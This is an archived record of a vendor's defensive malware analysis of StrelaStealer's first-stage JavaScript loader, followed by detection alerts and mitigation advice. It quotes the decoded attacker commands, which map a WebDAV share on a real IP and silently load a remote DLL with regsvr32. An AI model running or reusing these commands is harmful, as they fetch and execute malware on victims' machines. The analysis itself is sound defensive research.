{
	"id": "d261f78e-b9fb-4191-92be-5437ac869763",
	"created_at": "2026-05-05T02:45:20.790013Z",
	"updated_at": "2026-05-05T02:46:36.687081Z",
	"deleted_at": null,
	"sha1_hash": "b3b18199e67989fa4b685b0447c30db000df8c36",
	"title": "Exploring Strela Stealer: Initial Payload Analysis and Insights",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2217967,
	"plain_text": "Exploring Strela Stealer: Initial Payload Analysis and Insights\r\nBy Anish Bogati\r\nArchived: 2026-05-05 02:08:01 UTC\r\nBackground\r\nSimilar to our previous analysis of the Loki malware family, we recently observed another emerging threat:\r\nStrelaStealer. Like Loki, this malware does not introduce any groundbreaking or novel techniques. However, the\r\nadversaries behind StrelaStealer demonstrated their ability to evade defenses by obfuscating the payload in ways\r\nthat differ from typical malware techniques, including the insertion of extensive long junk text to complicate\r\nanalysis.\r\nStrelaStealer, also known as Strela, is an infostealer malware that specifically targets login credentials from\r\npopular email clients. It has recently adopted obfuscation techniques such as string concatenation, character\r\nsubstitution, and anti-analysis tactics, making it more challenging for security tools to detect and analyze.\r\nStrelaStealer is primarily distributed through malspam campaigns containing zip files. The initial payload\r\nextracted from these files is typically a JavaScript (JS) file, serving as the entry point for infection.\r\nThe initial payload, a JavaScript (JS) file, is executed using wscript.exe, the default execution binary for such files\r\non most Windows systems. During the file’s execution, all the instructions are extracted from the JS file.\r\nguardsix Process Tree\r\nWhen the JS file is executed, it spawns a child process: powershell.exe . Subsequently, a Base64-encoded\r\ncommand is executed via PowerShell.\r\nhttps://www.logpoint.com/en/blog/strela-a-newcomer-in-stealer-family/\r\nPage 1 of 8\n\nPowershell process detail from the process tree\r\nEncoded Base64 command:\r\nSyntax Highlighter\r\nThe above command translates into:\r\nSyntax Highlighter\r\nFrom the decoded command, the execution flow can be traced as follows: The command initiates the execution of\r\nthe timeout.exe binary, introducing a 1-second delay. Next, cmd.exe is invoked to run the Windows internal\r\nhttps://www.logpoint.com/en/blog/strela-a-newcomer-in-stealer-family/\r\nPage 2 of 8\n\nbinary, net.exe, which maps a network path to a WebDAV share. After that, regsvr32.exe is used to register and\r\nexecute a DLL file remotely.\r\nThe commands from above are further broken down as follows:\r\ntimeout 1 :\r\nThis pauses the execution for 1 second, creating a brief delay in the execution flow.\r\ncmd /c net use \\\\94.159.113.79@8888\\davwwwroot\\ :\r\nThis uses the net use command to attempt to map or connect to a network share located at\r\n\\\\94.159.113.79@8888\\davwwwroot\\ .\r\ncmd /c regsvr32 /s \\\\94.159.113.79@8888\\davwwwroot\\134257976134.dll :\r\nThis executes regsvr32 to silently (using the /s switch) register or load a DLL file\r\n( 134257976134.dll ) hosted at the specified network share path.\r\nIn other samples, we have observed the use of rundll32.exe instead of regsvr32.exe to execute remote DLLs.\r\nFollowing the execution of remote DLL the main Strela Payload is dropped and executed, which we will dive into\r\nin the upcoming blog.\r\nLooking Further into JS File\r\nWhen the JS file is opened in Notepad++, it appears as shown below. A common characteristic of the recent\r\npayloads we have analyzed regarding Strela Malware is their large document length.\r\nJS file contents\r\nhttps://www.logpoint.com/en/blog/strela-a-newcomer-in-stealer-family/\r\nPage 3 of 8\n\nAt first glance, the file contains lengthy object names with random properties assigned to seemingly arbitrary\r\nvalues. Following this is a function section and then a series of random string concatenations. The image below\r\nshows a reduced version of the initial payload for clarity.\r\nSyntax Highlighter\r\nVariable value assignement\r\nThe adversaries have created long junk variables with random values to obfuscate and manipulate the code. These\r\nvariables declare values that are later swapped with subsequent junk code. Due to the extensive code length,\r\nmanual analysis becomes challenging. The payload is essentially structured in two parts: one part for variable\r\ndeclarations and the second part that uses these variables during execution to perform swapping and obfuscation.\r\nWe start by renaming the objects and properties to shorter identifiers, such as varx[propx] , instead of the\r\nlengthy and complex names shown below.\r\nSyntax Highlighter\r\nRenamed values\r\nAfter renaming the declared variables, we identified the characters used for substitution, as shown below:\r\nhttps://www.logpoint.com/en/blog/strela-a-newcomer-in-stealer-family/\r\nPage 4 of 8\n\nKey value pair from the payload\r\nSyntax Highlighter\r\nOnce we identified the values, we simply renamed all other parts of the JS file accordingly.\r\nVariable renamed\r\nThe next step was to swap the values and concatenate to extract the payload, as shown in the image below.\r\nExtracted data\r\nIn summary, the extracted text contains a Base64-encoded payload. When deobfuscated, it reveals the PowerShell\r\ninstructions shown above.\r\nDetection with guardsix SIEM\r\nhttps://www.logpoint.com/en/blog/strela-a-newcomer-in-stealer-family/\r\nPage 5 of 8\n\nThe techniques observed in the analyzed StrelaStealer sample are not unique, but rather commonly employed by\r\nvarious initial loaders and droppers to circumvent detection mechanisms. These methods illustrate a growing trend\r\namong malware to employ more sophisticated tactics to evade traditional defenses. As malware continues to\r\nevolve, recognizing these techniques has become increasingly important for timely identification and response.\r\nTo successfully detect these advanced behaviors, it's essential to implement strong auditing practices and ensure\r\nthat relevant logs are generated. Proper logging and monitoring of key events provide invaluable insight into\r\nmalicious activity, enabling faster identification of suspicious behaviors. Effective threat detection and hunting\r\nrely heavily on capturing data from specific log sources. Below is a list of crucial log sources needed to support a\r\nrobust detection strategy:\r\n1. Windows\r\nProcess creation with command-line auditing should be enabled.\r\n2. Windows Sysmon\r\nTo get started, you can use our sysmon baseline configuration.\r\nSince many malware delivery techniques are similar, the alerts listed below have been highlighted in our previous\r\nblogs also. Ensure these alerts are enabled to effectively detect the initial infection chain.\r\nSuspicious File Execution Using Wscript or Cscript\r\nThe initial JS payload was executed using wscript.exe , making this alert effective for detecting the execution of\r\nscripting files files via wscript.exe or cscript.exe.\r\nSyntax Highlighter\r\nSuspicious PowerShell Parameter Substring Detected\r\nGiven that many of the attack steps utilized PowerShell and its cmdlets, this alert detects the use of suspicious\r\nPowerShell commandlets commonly linked to malicious activities, such as executing Base64-encoded payloads or\r\ndownloading remote files through PowerShell cmdlets.\r\nSyntax Highlighter\r\nSystem Network Connections Discovery\r\nThe use of net.exe to map or connect to a remote network share enabled the adversaries to remotely access and\r\nexecute files. This alert can be leveraged to detect similar events.\r\nhttps://www.logpoint.com/en/blog/strela-a-newcomer-in-stealer-family/\r\nPage 6 of 8\n\nSyntax Highlighter\r\nRegsvr32 Anomalous Activity Detected\r\nThis alert helps detect the suspicious use of the regsvr32.exe binary, which, in the case of Strela, was employed to\r\nexecute a remote file.\r\nSyntax Highlighter\r\nRecommendation\r\nBlock Potentially Exploited File Types: Limit the execution of commonly exploited file types like .js, which\r\nthreat actors frequently use for payload distribution. Exceptions should be carefully managed for trusted processes\r\nor authorized users to prevent disruption of legitimate activities.\r\nRegular User Training: Conduct routine training sessions for users to recognize and respond to social\r\nengineering and phishing attempts. Awareness and preparedness significantly reduce the likelihood of infection\r\nthrough these attack vectors.\r\nNetwork and Firewall Policies: Configure network policies and firewalls to block unauthorized connection\r\nattempts and outbound connections to untrusted remote hosts, reducing the risk of malware communication and\r\ndata exfiltration.\r\nhttps://www.logpoint.com/en/blog/strela-a-newcomer-in-stealer-family/\r\nPage 7 of 8\n\nImplement a Secure Email Gateway: Ensure the deployment of this technology, which plays a critical role in\r\nreducing risks by blocking the majority of malspam emails before they reach users.\r\nRestrict Software Installation: Limit user privileges to prevent the installation and execution of unauthorized\r\nsoftware, reducing exposure to potential infections.\r\nKeep Devices and Software Updated: Regularly update devices, browsers, and other applications to patch\r\nknown vulnerabilities and defend against evolving threats.\r\nEDR Deployment: Employ advanced Endpoint Detection and Response (EDR) solutions to identify suspicious\r\nactivity, particularly related to script execution and binary downloads. This enables early detection of malware\r\nbehavior, especially when novel techniques like those observed in Strela are employed.\r\nMonitor Web Browsing Behavior: Track user browsing habits and restrict access to sites known for malicious or\r\nharmful content, preventing potential malware downloads.\r\nComprehensive Logging and Monitoring: Maintain thorough logging, asset visibility, and system monitoring.\r\nRegular audits should be conducted to detect anomalous activities. Robust log collection from all systems\r\nsupports effective threat analysis and detection.\r\nLog Retention Policy: Establish a log retention period of at least six months to ensure sufficient data is available\r\nfor incident investigation, enabling a comprehensive understanding of any attack's origin and impact.\r\nSource: https://www.logpoint.com/en/blog/strela-a-newcomer-in-stealer-family/\r\nhttps://www.logpoint.com/en/blog/strela-a-newcomer-in-stealer-family/\r\nPage 8 of 8",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.logpoint.com/en/blog/strela-a-newcomer-in-stealer-family/"
	],
	"report_names": [
		"strela-a-newcomer-in-stealer-family"
	],
	"threat_actors": [],
	"ts_created_at": 1777949120,
	"ts_updated_at": 1777949196,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b3b18199e67989fa4b685b0447c30db000df8c36.pdf",
		"text": "https://archive.orkl.eu/b3b18199e67989fa4b685b0447c30db000df8c36.txt",
		"img": "https://archive.orkl.eu/b3b18199e67989fa4b685b0447c30db000df8c36.jpg"
	}
}